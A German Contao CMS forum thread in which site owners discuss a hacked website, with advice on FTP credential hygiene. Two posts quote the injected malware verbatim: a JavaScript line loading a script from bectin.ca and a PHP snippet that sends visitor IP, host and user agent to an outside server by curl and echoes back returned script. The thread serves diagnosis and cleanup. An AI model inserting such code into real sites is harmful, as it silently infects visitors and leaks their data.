Ergebnis 1 bis 4 von 4

Thema: Akkordeon geht nicht? Hacking?

  1. #1
    Contao-Nutzer
    Registriert seit
    12.10.2012.
    Beiträge
    24

    Fehler Akkordeon geht nicht? Hacking?

    Hacked oder nicht Hacked das ist hier die Frage?

    Bei Einer Seite meiner Kunden ging das Akkordeon-Menü nicht mehr und Google Chrom meldete Malware bectin.ca

    Folgende Meldung bekommt man beim Debugger

    /*35fb50*/
    document.write("<script src='http://bectin.ca/NhqPmcJy.php?id=131129068' type='text/javascript'></" + "script>");
    /*/35fb50*/

    Ich habe daraufhin die Datei e7cb2edaa7eb.js aus dem Folder assets/js gelöscht... jetzt geht wieder alles. Ich frag mich nun hatte einer ein ähnliches Problem. Ich würde gerne die eventuelle Sicherheitslücke schließen. Das war ziemlich nervig. Bei Google Chrome stand !Vorsicht Malware Seite nicht besuchen... blöd für Kunden mit Laufkundschaft.

  2. #2
    Wandelndes Contao-Lexikon Avatar von BugBuster
    Registriert seit
    15.06.2009.
    Ort
    Berlin
    Beiträge
    10.522
    User beschenken
    Wunschliste

    Standard

    Das wirst du da ganz schnell wieder drin haben denke ich.
    Das muss aber nicht Contao selbst sein, wodurch der Hack gelang. Näheres hier:
    http://de.contaowiki.org/Contao_gehackt
    Grüße, BugBuster
    "view source" is your guide.
    Danke an alle Amazon Wunschlisten Erfüller

  3. #3
    AG Pressearbeit
    Community-Moderator
    Buchautor 'Contao für Webdesigner'
    Avatar von planepix
    Registriert seit
    05.06.2009.
    Ort
    Stuttgart
    Beiträge
    6.482
    Partner-ID
    107
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Hallo ISNC,

    abklären mit welchen Tools auf die Website zugegriffen wurde.

    Filezilla als FTP-Programm ist zwar beliebt, speichert aber alle Zugangsdaten im Klartext. Und das lässt sich dann auch auslesen.
    Daher besser WinSCP (PC) oder Transmit (Mac) einsetzen.
    ---------------------------------
    Beste Grüße planepix
    Contao für Webdesigner (Website), Twitter: @contaowebdesign
    weitzeldesign
    Contao-Sprechstunde
    Contao Schulungen: https://www.weitzeldesign.com/cms-co...chulungen.html
    Contao Jahrbuch: www.contao-jahrbuch.de
    Contao Agenturtag: www.contao-agenturtag.de
    Contao Stammtisch Stuttgart: www.contao-stammtisch-stuttgart.de
    Contao 4 Erfahrungen als Gitbook: https://app.gitbook.com/@planepix/s/...-mit-contao-4/
    Contao 4 & Manager Hosterhinweise: https://github.com/contao/contao-manager/wiki

    Schon wieder ein Update?
    Glücklich sind die, die den Wert erkennen – und wertschätzen.
    „Muss man machen wie beim Zahnarzt. Der bestraft einen auch mit hohen Rechnungen wenn man die Pflege vernachlässigt.”

  4. #4
    Contao-Urgestein Avatar von tblumrich
    Registriert seit
    25.06.2009.
    Ort
    Feldberger Seenlandschaft
    Beiträge
    2.225
    Partner-ID
    7979
    User beschenken
    Wunschliste

    Standard

    Hi.

    Das Ding hatte ich letztens auch drin... und zwar in so ziemlich allen JS Dateien der ersten und zweiten Ebene der Installation(en).

    Ebenso mal alle index.php, page.php, main.php checken... bei mir war da meist irgendwo sowas hier drin:

    PHP-Code:
    <?php
    #11cdd2#
    error_reporting(0); ini_set('display_errors',0); $wp_wkmma7 = @$_SERVER['HTTP_USER_AGENT'];
    if (( 
    preg_match ('/Gecko|MSIE/i'$wp_wkmma7) && !preg_match ('/bot/i'$wp_wkmma7))){
    $wp_wkmma097="http://"."tag"."modules".".com/modules"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wkmma7);
    $ch curl_init(); curl_setopt ($chCURLOPT_URL,$wp_wkmma097);
    curl_setopt ($chCURLOPT_TIMEOUT6); curl_setopt($chCURLOPT_RETURNTRANSFER1); $wp_7wkmma curl_exec ($ch); curl_close($ch);}
    if ( 
    substr($wp_7wkmma,1,3) === 'scr' ){ echo $wp_7wkmma; }
    #/11cdd2#
    ?>
    Keine Ahnung ob die Sachen im Zusammenhang stehen, die Dateien wurden aber an unterschiedlichen Tagen kompromitiert.
    Contao Check (neu installieren) sollte schonmal einiges an Info liefern.

    Kommt aber keinesfalls über Contao, sondern übern FTP.
    Kein besonders gutes Gefühl, da ich die Schwachstelle leider nicht genau lokalisieren konnte. Für mich war das unter anderem auch Anlass die letzten Reste von Filezilla vom Rechner zu fegen.

    Gruß
    Thomas
    blucomp | Webdesign & Onlinelösungen

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •